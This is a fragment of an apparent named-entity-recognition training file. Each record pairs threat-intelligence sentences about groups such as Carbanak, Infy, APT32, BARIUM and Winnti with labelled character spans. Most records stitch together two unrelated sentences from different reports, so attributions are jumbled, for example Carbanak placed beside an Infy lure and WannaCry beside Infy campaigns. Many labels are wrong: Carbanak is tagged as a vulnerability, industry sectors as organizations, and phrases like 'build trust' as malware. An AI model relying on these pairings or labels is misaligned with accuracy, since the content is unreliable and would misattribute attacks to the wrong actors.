Government recipient .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 30, "end": 43, "label": "Organization"}, {"start": 48, "end": 52, "label": "Organization"}, {"start": 60, "end": 80, "label": "Organization"}, {"start": 111, "end": 130, "label": "Organization"}, {"start": 151, "end": 164, "label": "Organization"}, {"start": 167, "end": 192, "label": "Organization"}, {"start": 199, "end": 219, "label": "Organization"}, {"start": 245, "end": 253, "label": "Organization"}, {"start": 271, "end": 277, "label": "System"}, {"start": 291, "end": 295, "label": "System"}, {"start": 309, "end": 319, "label": "Indicator"}, {"start": 362, "end": 366, "label": "System"}, {"start": 403, "end": 413, "label": "Organization"}]} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . attacks using this tool were still active as of April 2016 .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 187, "end": 196, "label": "Organization"}]} {"text": "This report describes the details and type of operations carried out by Carbanak that focuses on financial industry , such as payment providers , retail industry and PR companies . Considering the language being used in the malicious code is Arabic , it seems that the attacker is familiar with Arabic language as well .", "spans": [{"start": 72, "end": 80, "label": "Vulnerability"}, {"start": 97, "end": 115, "label": "Organization"}, {"start": 126, "end": 143, "label": "Organization"}, {"start": 146, "end": 161, "label": "Organization"}, {"start": 166, "end": 178, "label": "Organization"}]} {"text": "From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space . 
The initially-observed \" thanks.pps \" example tricks the user into running the embedded file named ins8376.exe which loads a payload DLL named mpro324.dll .", "spans": [{"start": 10, "end": 18, "label": "Vulnerability"}, {"start": 55, "end": 60, "label": "Organization"}, {"start": 65, "end": 83, "label": "Organization"}, {"start": 125, "end": 130, "label": "Organization"}, {"start": 158, "end": 168, "label": "Indicator"}, {"start": 232, "end": 243, "label": "Indicator"}, {"start": 266, "end": 269, "label": "System"}, {"start": 276, "end": 287, "label": "Indicator"}]} {"text": "Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems . In this case , the file used the software name \" Cyberlink \" , and a description of \" CLMediaLibrary Dynamic Link Library \" and listing version 4.19.9.98 .", "spans": [{"start": 11, "end": 19, "label": "Vulnerability"}, {"start": 79, "end": 84, "label": "Organization"}, {"start": 91, "end": 106, "label": "Organization"}, {"start": 158, "end": 167, "label": "Indicator"}, {"start": 210, "end": 230, "label": "System"}]} {"text": "The Charming Kitten' focus appears to be individuals of interest to Iran in the fields of academic research . 
Unit 42 published a blog at the beginning of May titled \" Prince of Persia \" , in which we described the discovery of a decade-long campaign using a formerly unknown malware family , Infy , that targeted government and industry interests worldwide .", "spans": [{"start": 4, "end": 20, "label": "Organization"}, {"start": 90, "end": 107, "label": "Organization"}, {"start": 110, "end": 117, "label": "Organization"}, {"start": 293, "end": 297, "label": "Malware"}, {"start": 314, "end": 324, "label": "Organization"}, {"start": 329, "end": 337, "label": "Organization"}]} {"text": "However , even though the TTPs of the Cleaver team have some overlap to techniques used by Iranian Cyber Army ( botnets ) , Ashiyane ( SQL injection ) and Syrian Electronic Army ( phishing ) , we believe this is largely the work of a new team . We noted in our original blog the large amount of targeting of Iranian citizens in this campaign , we observed almost one-third of all victims to be Iranian .", "spans": [{"start": 38, "end": 45, "label": "Organization"}, {"start": 99, "end": 109, "label": "Organization"}, {"start": 124, "end": 132, "label": "Organization"}, {"start": 155, "end": 177, "label": "Organization"}, {"start": 316, "end": 324, "label": "Organization"}]} {"text": "Since 2013 , the Cobalt have attempted to attack banks and financial institutions using pieces of malware they designed . 
In addition to the original \" Infy \" variant , we also see the newer , more sophisticated , interactive , and fuller-featured \" Infy M \" variant deployed against apparently-higher-value targets .", "spans": [{"start": 17, "end": 23, "label": "Organization"}, {"start": 49, "end": 54, "label": "Organization"}, {"start": 59, "end": 81, "label": "Organization"}, {"start": 152, "end": 156, "label": "Malware"}, {"start": 250, "end": 256, "label": "Malware"}]} {"text": "Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt . This documentation provides new insight into intrusion efforts conducted by at least four discrete Iranian threat actors , Rocket Kitten , Infy , Sima , and Operation Cleaver , including groups and tools that have not been previously disclosed .", "spans": [{"start": 17, "end": 32, "label": "Organization"}, {"start": 58, "end": 63, "label": "Organization"}, {"start": 66, "end": 75, "label": "Organization"}, {"start": 88, "end": 110, "label": "Organization"}, {"start": 160, "end": 168, "label": "Vulnerability"}, {"start": 173, "end": 179, "label": "System"}, {"start": 305, "end": 318, "label": "Organization"}, {"start": 321, "end": 325, "label": "Organization"}, {"start": 328, "end": 332, "label": "Organization"}]} {"text": "Gallmaker 's activity appears to be highly targeted , with its victims all related to government , military , or defense sectors . 
Since early 2013 , we have observed activity from a unique threat actor group , which we began to investigate based on increased activities against human right activists in the beginning of 2015 .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 86, "end": 96, "label": "Organization"}, {"start": 99, "end": 107, "label": "Organization"}, {"start": 113, "end": 128, "label": "Organization"}, {"start": 291, "end": 300, "label": "Organization"}]} {"text": "There are no obvious links between the Eastern European and Middle Eastern targets , but it is clear that Gallmaker is specifically targeting the defense , military , and government sectors . Over the course of three years of observation of campaigns targeting civil society and human rights organizations , from records of well over two hundred spearphishing and other intrusion attempts against individuals inside of Iran and in the diaspora , a narrative of persistent intrusion efforts emerges .", "spans": [{"start": 106, "end": 115, "label": "Organization"}, {"start": 146, "end": 153, "label": "Organization"}, {"start": 156, "end": 164, "label": "Organization"}, {"start": 171, "end": 189, "label": "Organization"}, {"start": 261, "end": 274, "label": "Organization"}, {"start": 279, "end": 305, "label": "Organization"}, {"start": 435, "end": 443, "label": "Organization"}]} {"text": "traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors . 
Thanks to information we have been able to collect during the course of our research , such as characteristics of the group 's malware and development cycle , our research strongly supports the claim that the Infy group is of Iranian origin and potentially connected to the Iranian state .", "spans": [{"start": 27, "end": 36, "label": "Organization"}, {"start": 39, "end": 45, "label": "Organization"}, {"start": 48, "end": 58, "label": "Organization"}, {"start": 61, "end": 70, "label": "Organization"}, {"start": 73, "end": 92, "label": "Organization"}, {"start": 99, "end": 108, "label": "Organization"}, {"start": 111, "end": 124, "label": "Organization"}, {"start": 127, "end": 141, "label": "Organization"}, {"start": 353, "end": 357, "label": "Organization"}]} {"text": "The Ke3chang have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , chemicals , manufacturing , mining sectors . Amongst a backdrop of other incidents , Infy became one of the most frequently observed agents for attempted malware attacks against Iranian civil society beginning in late 2014 , growing in use up to the February 2016 parliamentary election in Iran .", "spans": [{"start": 4, "end": 12, "label": "Organization"}, {"start": 97, "end": 106, "label": "Organization"}, {"start": 109, "end": 115, "label": "Organization"}, {"start": 118, "end": 128, "label": "Organization"}, {"start": 131, "end": 140, "label": "Organization"}, {"start": 143, "end": 162, "label": "Organization"}, {"start": 165, "end": 174, "label": "Organization"}, {"start": 177, "end": 190, "label": "Organization"}, {"start": 193, "end": 207, "label": "Organization"}, {"start": 351, "end": 364, "label": "Organization"}]} {"text": "The attackers have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining 
sectors . Until the publication of the Palo Alto report , the developers of the Infy appeared to be actively updating and maintaining the codebase , and new releases were distributed to existing , as well as new , targets quite regularly .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 98, "end": 107, "label": "Organization"}, {"start": 110, "end": 116, "label": "Organization"}, {"start": 119, "end": 129, "label": "Organization"}, {"start": 132, "end": 141, "label": "Organization"}, {"start": 144, "end": 163, "label": "Organization"}, {"start": 170, "end": 179, "label": "Organization"}, {"start": 182, "end": 195, "label": "Organization"}, {"start": 198, "end": 212, "label": "Organization"}, {"start": 244, "end": 253, "label": "Organization"}, {"start": 285, "end": 289, "label": "Malware"}]} {"text": "APT15 was targeting information related to UK government departments and military technology . Other samples were found bearing a compilation time as early as June 2012 and version 00002 .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 46, "end": 56, "label": "Organization"}, {"start": 73, "end": 92, "label": "Organization"}]} {"text": "APT15 is known for committing cyberespionage against companies and organizations located in many different countries , targeting different sectors such as the oil industry , government contractors , military , and more . 
Over the months following the elections , the accounts of Iranians that had been compromised by the actors were then used for spreading the malware .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 30, "end": 44, "label": "Organization"}, {"start": 159, "end": 171, "label": "Organization"}, {"start": 174, "end": 196, "label": "Organization"}, {"start": 199, "end": 207, "label": "Organization"}, {"start": 279, "end": 287, "label": "Organization"}]} {"text": "cyber actors of the North Korean to target the media , aerospace , financial , and critical infrastructure sectors in the United States and globally . When activities targeting of civil society subsided , the actors instead appeared to have focused on external targets , such a series of attempts to spearphish the Danish Ministry of Foreign Affairs .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 47, "end": 52, "label": "Organization"}, {"start": 55, "end": 64, "label": "Organization"}, {"start": 67, "end": 76, "label": "Organization"}, {"start": 83, "end": 114, "label": "Organization"}, {"start": 180, "end": 193, "label": "Organization"}]} {"text": "According to trusted third-party reporting , HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace , telecommunications , and finance industries . Palo Alto Networks has noted and described the differences of two malware agents developed in parallel , with commonalities in behavior but differing functionalities ; families described as Infy and Infy M. 
Our primary observation was of the Infy ( non-M ) malware , which primarily functions as a keylogger for the collection of account credentials .", "spans": [{"start": 45, "end": 64, "label": "Organization"}, {"start": 88, "end": 105, "label": "System"}, {"start": 131, "end": 140, "label": "Organization"}, {"start": 143, "end": 161, "label": "Organization"}, {"start": 168, "end": 186, "label": "Organization"}, {"start": 189, "end": 207, "label": "Organization"}, {"start": 379, "end": 383, "label": "Malware"}, {"start": 388, "end": 395, "label": "Malware"}, {"start": 431, "end": 435, "label": "Malware"}, {"start": 438, "end": 443, "label": "Malware"}, {"start": 446, "end": 453, "label": "Malware"}, {"start": 487, "end": 496, "label": "Malware"}]} {"text": "McAfee Advanced Threat Research analysts have uncovered a global data reconnaissance campaign assaulting a wide number of industries including critical infrastructure , entertainment , finance , health care , and telecommunications . Our observation of Infy 's campaigns , primarily through the lens of spearphishing attacks against Iranian civil society and media organizations , indicates a wandering focus on particular demographics on a strategic basis over time .", "spans": [{"start": 0, "end": 31, "label": "Organization"}, {"start": 143, "end": 166, "label": "Organization"}, {"start": 169, "end": 182, "label": "Organization"}, {"start": 185, "end": 192, "label": "Organization"}, {"start": 195, "end": 206, "label": "Organization"}, {"start": 213, "end": 231, "label": "Organization"}, {"start": 341, "end": 354, "label": "Organization"}, {"start": 359, "end": 378, "label": "Organization"}]} {"text": "Since at least 2013 , HIDDEN COBRA actors have been observed using Volgmer malware in the wild to target the government , financial , automotive , and media industries . 
The Infy malware was seen targeting Iranians again in June 2015 , when it was shared with researchers after being sent to a broadcast journalist at BBC Persian with a generic introduction and a PowerPoint presentation attached titled \" Nostalogy \" ( sic ) .", "spans": [{"start": 22, "end": 41, "label": "Organization"}, {"start": 67, "end": 82, "label": "System"}, {"start": 109, "end": 119, "label": "Organization"}, {"start": 122, "end": 131, "label": "Organization"}, {"start": 134, "end": 144, "label": "Organization"}, {"start": 151, "end": 167, "label": "Organization"}, {"start": 174, "end": 178, "label": "Malware"}, {"start": 179, "end": 186, "label": "Malware"}, {"start": 206, "end": 214, "label": "Organization"}, {"start": 294, "end": 314, "label": "Organization"}, {"start": 318, "end": 329, "label": "Organization"}, {"start": 364, "end": 374, "label": "System"}]} {"text": "Ransomware that has been publicly named \" WannaCry \" , \" WCry \" or \" WanaCrypt0r \" ( based on strings in the binary and encrypted files ) has spread to at least 74 countries as of Friday 12 May 2017 , reportedly targeting Russia initially , and spreading to telecommunications , shipping , car manufacturers , universities and health care industries , among others . 
Based on information collected in the course of this research , the targets and victims of Infy 's campaigns have continued to be strongly aligned with Iran 's \" soft war \" agenda , internal security policies , and regional adversaries of the hardline establishment of the Islamic Republic of Iran .", "spans": [{"start": 42, "end": 50, "label": "System"}, {"start": 57, "end": 61, "label": "System"}, {"start": 69, "end": 80, "label": "System"}, {"start": 258, "end": 276, "label": "Organization"}, {"start": 279, "end": 287, "label": "Organization"}, {"start": 290, "end": 307, "label": "Organization"}, {"start": 310, "end": 322, "label": "Organization"}, {"start": 327, "end": 349, "label": "Organization"}]} {"text": "Ransomware that has been publicly named \" WannaCry \" , \" WCry \" or \" WanaCrypt0r \" ( based on strings in the binary and encrypted files ) has spread to at least 74 countries as of Friday 12 May 2017 , reportedly targeting Russia initially , and spreading to telecommunications , shipping , car manufacturers , universities and health care industries , among others . 
Until late December 2015 , in nearly every Infy message documented since our tracking began in May 2013 , no attempt included strong tailoring of the approach , often not even including an email body , instead relying on cryptic filenames and email subjects to attract interest .", "spans": [{"start": 42, "end": 50, "label": "System"}, {"start": 57, "end": 61, "label": "System"}, {"start": 69, "end": 80, "label": "System"}, {"start": 258, "end": 276, "label": "Organization"}, {"start": 279, "end": 287, "label": "Organization"}, {"start": 290, "end": 307, "label": "Organization"}, {"start": 310, "end": 322, "label": "Organization"}, {"start": 327, "end": 349, "label": "Organization"}, {"start": 410, "end": 422, "label": "Malware"}]} {"text": "Known targets of the Leviathan have been involved in the maritime industry , and research institutes , academic organizations , and private firms in the United States . One narrowly-targeted spearphishing from Infy was sent from the compromised account of a political activist promoting participation inside of Iran , claiming to be a set of images of a British-Iranian dual national that has been held in Evin Prison for five years on espionage charges .", "spans": [{"start": 21, "end": 30, "label": "Organization"}, {"start": 57, "end": 74, "label": "Organization"}, {"start": 81, "end": 100, "label": "Organization"}, {"start": 103, "end": 125, "label": "Organization"}, {"start": 132, "end": 145, "label": "Organization"}, {"start": 258, "end": 276, "label": "Organization"}, {"start": 354, "end": 369, "label": "Organization"}]} {"text": "Active since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities . 
As in the past , these messages have been sent accounts believed to be fake and accounts compromised by Infy , including Kurdish activists that had previously been compromised by the Flying Kitten actor group .", "spans": [{"start": 29, "end": 43, "label": "Organization"}, {"start": 132, "end": 149, "label": "Organization"}, {"start": 152, "end": 160, "label": "Organization"}, {"start": 165, "end": 179, "label": "Organization"}, {"start": 182, "end": 195, "label": "Organization"}, {"start": 198, "end": 205, "label": "Organization"}, {"start": 208, "end": 226, "label": "Organization"}, {"start": 233, "end": 254, "label": "Organization"}, {"start": 378, "end": 395, "label": "Organization"}, {"start": 440, "end": 465, "label": "Organization"}]} {"text": "Within a year APT40 was observed masquerading as a UUV manufacturer , and targeting universities engaged in naval research . The actors successfully compromised a host of an Saudi government institutions on January 17 , 2016 , and maintained access for at least two weeks .", "spans": [{"start": 14, "end": 19, "label": "Organization"}, {"start": 84, "end": 96, "label": "Organization"}, {"start": 180, "end": 203, "label": "Organization"}]} {"text": "APT40 engages in broader regional targeting against traditional intelligence targets , especially organizations with operations in Southeast Asia . The Infy group also appears to engage in espionage activities against foreign governments and businesses .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 152, "end": 162, "label": "Organization"}, {"start": 226, "end": 237, "label": "Organization"}, {"start": 242, "end": 252, "label": "Organization"}]} {"text": "Lotus Blossom targeted the government , higher education , and high tech companies . 
In order to initially compromise the designated targets , Infy typically distributed specifically-crafted malicious documents containing Infy through spearphishing attacks .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 27, "end": 37, "label": "Organization"}, {"start": 40, "end": 56, "label": "Organization"}, {"start": 63, "end": 82, "label": "Organization"}, {"start": 222, "end": 226, "label": "Malware"}]} {"text": "The Lotus Blossom largely targets military or government , with some cases of higher education and high tech companies . In order to initially compromise the designated targets , the attackers typically distributed specifically-crafted malicious documents containing Infy through spearphishing attacks .", "spans": [{"start": 4, "end": 17, "label": "Organization"}, {"start": 34, "end": 42, "label": "Organization"}, {"start": 46, "end": 56, "label": "Organization"}, {"start": 78, "end": 94, "label": "Organization"}, {"start": 99, "end": 118, "label": "Organization"}, {"start": 267, "end": 271, "label": "Malware"}]} {"text": "Organizations in the government , energy , and technology sectors have been targeted by Magic Hound , specifically organizations based in or doing business in Saudi Arabia . 
On May 2 , 2016 , Palo Alto Networks published the report \" Prince of Persia \" , which provided the first public and widely-reported indication of Infy 's activities in Iran , while other publications either refrained from making the association or were not openly available .", "spans": [{"start": 21, "end": 31, "label": "Organization"}, {"start": 34, "end": 40, "label": "Organization"}, {"start": 47, "end": 65, "label": "Organization"}, {"start": 192, "end": 210, "label": "Organization"}, {"start": 321, "end": 325, "label": "Organization"}]} {"text": "Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations with investments in Vietnam , foreign governments , journalists , and Vietnamese dissidents . Prior to the distribution of new versions of the agent , the Infy developers appear to consistently conduct tests from local hosts , which indicates that the control and maintenance of the software occurs in the Khorasan Razavi province of Iran , potentially in the city of Mashhad .", "spans": [{"start": 22, "end": 27, "label": "Organization"}, {"start": 48, "end": 64, "label": "Organization"}, {"start": 80, "end": 100, "label": "Organization"}, {"start": 131, "end": 150, "label": "Organization"}, {"start": 153, "end": 164, "label": "Organization"}, {"start": 182, "end": 192, "label": "Organization"}, {"start": 256, "end": 260, "label": "Malware"}]} {"text": "Evidence also suggests that APT32 has targeted network security and technology infrastructure corporations with connections to foreign investors . 
On May 2 , 2016 , Palo Alto published the report \" Prince of Persia \" , which provided the first public and widely-reported indication of Infy 's activities in Iran , while other publications either refrained from making the association or were not openly available .", "spans": [{"start": 28, "end": 33, "label": "Organization"}, {"start": 47, "end": 63, "label": "Organization"}, {"start": 68, "end": 106, "label": "Organization"}, {"start": 165, "end": 174, "label": "Organization"}]} {"text": "Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations foreign governments . Only one client , based in Iran , continued to communicate with the infrastructure .", "spans": [{"start": 22, "end": 27, "label": "Organization"}, {"start": 48, "end": 64, "label": "Organization"}, {"start": 80, "end": 100, "label": "Organization"}, {"start": 109, "end": 120, "label": "Organization"}]} {"text": "Additionally , there is evidence to suggest APT33 targeted Saudi Arabian and Western organizations that provide training , maintenance and support for Saudi Arabia 's military and commercial fleets . A researcher has attributed a recently publicized attack on Citrix' internal network to the Iranian-linked group known as IRIDIUM \u2013 and said that the data heist involved 6 terabytes of sensitive data .", "spans": [{"start": 44, "end": 49, "label": "Organization"}, {"start": 167, "end": 175, "label": "Organization"}, {"start": 180, "end": 190, "label": "Organization"}, {"start": 260, "end": 267, "label": "Organization"}]} {"text": "The OilRig group conducts operations primarily in the Middle East , targeting financial , government , energy , chemical , telecommunications and other industries . 
\" IRIDIUM has hit more than 200 government agencies , oil and gas companies and technology companies , including Citrix Systems Inc \" , they said .", "spans": [{"start": 4, "end": 16, "label": "Organization"}, {"start": 78, "end": 87, "label": "Organization"}, {"start": 90, "end": 100, "label": "Organization"}, {"start": 103, "end": 109, "label": "Organization"}, {"start": 112, "end": 120, "label": "Organization"}, {"start": 123, "end": 141, "label": "Organization"}, {"start": 197, "end": 216, "label": "Organization"}, {"start": 219, "end": 222, "label": "Organization"}, {"start": 227, "end": 240, "label": "Organization"}, {"start": 245, "end": 265, "label": "Organization"}, {"start": 278, "end": 296, "label": "Organization"}]} {"text": "APT35 typically targets military , diplomatic and government , media , energy , engineering , business services and telecommunications sectors in U.S. and the Middle East . Citrix told Threatpost that this is indeed the same password-spraying attack it announced itself last week \u2013 but it wouldn't confirm the other details in Resecurity 's post , including the attribution .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 24, "end": 32, "label": "Organization"}, {"start": 35, "end": 45, "label": "Organization"}, {"start": 50, "end": 60, "label": "Organization"}, {"start": 63, "end": 68, "label": "Organization"}, {"start": 71, "end": 77, "label": "Organization"}, {"start": 80, "end": 91, "label": "Organization"}, {"start": 94, "end": 111, "label": "Organization"}, {"start": 116, "end": 142, "label": "Organization"}, {"start": 173, "end": 179, "label": "Organization"}, {"start": 327, "end": 337, "label": "Organization"}]} {"text": "APT35 typically targets U.S. and the Middle Eastern military , diplomatic and government personnel , organizations in the media , energy and defense industrial base ( DIB ) , and engineering , business services and telecommunications sectors . 
In wake of these events , a security firm Resecurity reached out to NBC news and claimed that they had reasons to believe that the attacks were carried out by Iranian-linked group known as IRIDIUM .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 52, "end": 60, "label": "Organization"}, {"start": 63, "end": 73, "label": "Organization"}, {"start": 78, "end": 98, "label": "Organization"}, {"start": 101, "end": 114, "label": "Organization"}, {"start": 122, "end": 127, "label": "Organization"}, {"start": 130, "end": 136, "label": "Organization"}, {"start": 141, "end": 164, "label": "Organization"}, {"start": 167, "end": 170, "label": "Organization"}, {"start": 179, "end": 190, "label": "Organization"}, {"start": 193, "end": 210, "label": "Organization"}, {"start": 215, "end": 241, "label": "Organization"}, {"start": 272, "end": 285, "label": "Organization"}, {"start": 286, "end": 296, "label": "Organization"}]} {"text": "Since at least 2013 , the Iranian threat group that FireEye tracks as APT33 has carried out a cyber espionage operation to collect information from defense , aerospace and petrochemical organizations . 
Resecurity says that IRIDIUM \" has hit more than 200 government agencies , oil and gas companies , and technology companies including Citrix .", "spans": [{"start": 34, "end": 46, "label": "Organization"}, {"start": 52, "end": 59, "label": "Organization"}, {"start": 70, "end": 75, "label": "Organization"}, {"start": 148, "end": 155, "label": "Organization"}, {"start": 158, "end": 167, "label": "Organization"}, {"start": 172, "end": 199, "label": "Organization"}, {"start": 202, "end": 212, "label": "Organization"}, {"start": 255, "end": 274, "label": "Organization"}, {"start": 277, "end": 280, "label": "Organization"}, {"start": 285, "end": 298, "label": "Organization"}, {"start": 305, "end": 325, "label": "Organization"}, {"start": 336, "end": 342, "label": "Organization"}]} {"text": "Since at least 2013 , the Iranian threat group FireEye tracks as APT33 has carried out a cyber espionage operation to collect information from defense , aerospace and petrochemical organizations . Resecurity claims that IRIDIUM breached Citrix 's network during December 2018 .", "spans": [{"start": 34, "end": 46, "label": "Organization"}, {"start": 47, "end": 54, "label": "Organization"}, {"start": 65, "end": 70, "label": "Organization"}, {"start": 143, "end": 150, "label": "Organization"}, {"start": 153, "end": 162, "label": "Organization"}, {"start": 167, "end": 194, "label": "Organization"}, {"start": 197, "end": 207, "label": "Organization"}, {"start": 237, "end": 243, "label": "Organization"}]} {"text": "Ultimately , APT35 had used access to hundreds of mailboxes to read email communications and steal data related to Middle East organizations , which later became victims of destructive attacks . 
Infy engaged in malware spearphishing against the same targets as Flying Kitten from the outset of its campaign ; Operation Cleaver has registered several resources related to development agencies that have been the subject of intrusion attempts by others since February 2014 .", "spans": [{"start": 13, "end": 18, "label": "Organization"}, {"start": 68, "end": 88, "label": "Organization"}, {"start": 195, "end": 199, "label": "Malware"}, {"start": 371, "end": 391, "label": "Organization"}]} {"text": "Further analysis revealed a well-established collection of fake social media profiles that appear intended to build trust and rapport with potential victims . The malicious samples we found are the early stage malware most often delivered by spear-phishing e-mails .", "spans": [{"start": 64, "end": 76, "label": "Organization"}, {"start": 110, "end": 121, "label": "Malware"}, {"start": 126, "end": 156, "label": "Malware"}]} {"text": "COBALT GYPSY has used spearphishing to target telecommunications , government , defense , oil , and financial services organizations based in or affiliated with the MENA region , identifying individual victims through social media sites . 
This next stage library copies itself into the System32 directory of the Windows folder after the hardcoded file name \u2014 either KBDLV2.DLL or AUTO.DLL , depending on the malware sample .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 46, "end": 64, "label": "Organization"}, {"start": 67, "end": 77, "label": "Organization"}, {"start": 80, "end": 87, "label": "Organization"}, {"start": 90, "end": 93, "label": "Organization"}, {"start": 100, "end": 132, "label": "Organization"}, {"start": 191, "end": 209, "label": "Organization"}, {"start": 218, "end": 230, "label": "Organization"}, {"start": 312, "end": 319, "label": "System"}, {"start": 366, "end": 376, "label": "Indicator"}, {"start": 380, "end": 388, "label": "Indicator"}]} {"text": "The Magic Hound has repeatedly used social media to identify and interact with employees at targeted organizations and then used weaponized Excel documents . At this stage , the malware gathers information about the infected computer .", "spans": [{"start": 36, "end": 48, "label": "Organization"}, {"start": 79, "end": 88, "label": "Organization"}]} {"text": "We identified decoy files which indicate these attacks began with spear phishing messages but have not observed the actual messages . Hancom Office is widely used in South Korea .", "spans": [{"start": 14, "end": 25, "label": "Malware"}]} {"text": "This group has used a large array of infection vectors , mostly revolving around drive-by downloads and spam . Perhaps it also points to the suspected North Korean origin of attack .", "spans": [{"start": 5, "end": 10, "label": "Organization"}]} {"text": "To infect individuals with access to the data the actors desire , Scarlet Mimic deploys both spear-phishing and watering hole ( strategic web compromise ) attacks . 
The attacker is from North Korea .", "spans": [{"start": 50, "end": 56, "label": "Organization"}, {"start": 66, "end": 79, "label": "Organization"}]} {"text": "As with many other attackers who use spear-phishing to infect victims , Scarlet Mimic makes heavy use of \" decoy \" files . All of them lie in ranges of the Jilin Province Network and Liaoning Province Network , in China .", "spans": [{"start": 19, "end": 28, "label": "Organization"}, {"start": 72, "end": 85, "label": "Organization"}]} {"text": "The most recent Scarlet Mimic attacks we have identified were conducted in 2015 and suggest the group has a significant interest in both Muslim activists and those interested in critiques of the Russian government and Russian President Vladimir Putin . Finally , this geo-location supports the likely theory that the attackers behind Kimsuky are based in North Korea .", "spans": [{"start": 96, "end": 101, "label": "Organization"}, {"start": 137, "end": 153, "label": "Organization"}, {"start": 334, "end": 341, "label": "Organization"}]} {"text": "Using these tactics Scarlet Mimic can directly target previously identified individuals ( spear phishing ) as well as unidentified individuals who are interested in a specific subject ( watering hole ) . In this blog , we look at the Winnti malware implant as used by two known activity groups BARIUM and LEAD .", "spans": [{"start": 20, "end": 33, "label": "Organization"}, {"start": 234, "end": 240, "label": "Malware"}, {"start": 241, "end": 248, "label": "Malware"}, {"start": 294, "end": 300, "label": "Organization"}]} {"text": "Scarlet Mimic primarily deploys spear-phishing e-mails to infect its targets , but was also responsible for a watering hole attack in 2013 . 
According to the German press , the intruders used the Winnti family of malware as their main implant , giving them persistent access to the conglomerate 's network as early as February 2016 .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 196, "end": 220, "label": "Malware"}]} {"text": "Scarlet Mimic has carried out attacks using both spear-phishing and watering holes since at least 2009 with increasingly advanced malware , and has deployed malware to attack multiple operating systems and platforms . In the case of this malware , the activity groups strongly associated with Winnti are BARIUM and LEAD .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 293, "end": 299, "label": "Malware"}, {"start": 304, "end": 310, "label": "Malware"}, {"start": 315, "end": 319, "label": "Malware"}]} {"text": "The group primarily deploys spear-phishing e-mails to infect its targets , but was also responsible for a watering hole attack in 2013 . But even though they share the use of Winnti , the BARIUM and LEAD activity groups are involved in very different intrusion scenarios .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 175, "end": 181, "label": "Malware"}, {"start": 188, "end": 194, "label": "Malware"}, {"start": 199, "end": 203, "label": "Malware"}]} {"text": "When using email scams , SilverTerrier actors preferred to use large target audiences , which maximized the likelihood of success with very little risk . To show how this breach and similar breaches can be mitigated , we look at how Windows Defender ATP flags activities associated with BARIUM , LEAD , and other known activity groups and how it provides extensive threat intelligence about these groups .", "spans": [{"start": 25, "end": 45, "label": "Organization"}, {"start": 233, "end": 253, "label": "Organization"}]} {"text": "The malware may inject itself into browser processes and explorer.exe . 
BARIUM begins its attacks by cultivating relationships with potential victims\u2014particularly those working in Business Development or Human Resources\u2014on various social media platforms .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 57, "end": 69, "label": "Malware"}, {"start": 231, "end": 243, "label": "Organization"}]} {"text": "In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . During these intrusions , LEAD 's objective was to steal sensitive data , including research materials , process documents , and project plans .", "spans": [{"start": 44, "end": 59, "label": "Malware"}, {"start": 124, "end": 137, "label": "Vulnerability"}]} {"text": "In their current campaign , APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros . Initial intrusion stages feature the Win32/Barlaiy implant\u2014notable for its use of social network profiles , collaborative document editing sites , and blogs for C&C .", "spans": [{"start": 28, "end": 33, "label": "Organization"}, {"start": 48, "end": 64, "label": "Malware"}, {"start": 185, "end": 198, "label": "Malware"}, {"start": 309, "end": 312, "label": "System"}]} {"text": "APT32 actors continue to deliver the malicious attachments via spear-phishing emails . 
Once BARIUM has established rapport , they spear-phish the victim using a variety of unsophisticated malware installation vectors , including malicious shortcut ( .lnk ) files with hidden payloads .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 37, "end": 58, "label": "Malware"}, {"start": 188, "end": 195, "label": "Malware"}, {"start": 250, "end": 254, "label": "Indicator"}]} {"text": "In the following weeks , FireEye released threat intelligence products and updated malware profiles to customers while developing new detection techniques for APT32\u2019s tools and phishing lures . Instead , the group often simply emails a Winnti installer to potential victims , relying on basic social engineering tactics to convince recipients to run the attached malware .", "spans": [{"start": 25, "end": 32, "label": "Organization"}, {"start": 159, "end": 166, "label": "Organization"}, {"start": 227, "end": 233, "label": "System"}, {"start": 236, "end": 252, "label": "Malware"}]} {"text": "FIN7 is a financially motivated intrusion set that selectively targets victims and uses spear phishing to distribute its malware . Microsoft Analytics shows that Winnti has been used in intrusions carried out throughout Asia , Europe , Oceania , the Middle East , and the United States in the last six months ( Figure 1 ) .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 10, "end": 21, "label": "Organization"}, {"start": 131, "end": 150, "label": "Organization"}, {"start": 162, "end": 168, "label": "Malware"}]} {"text": "The 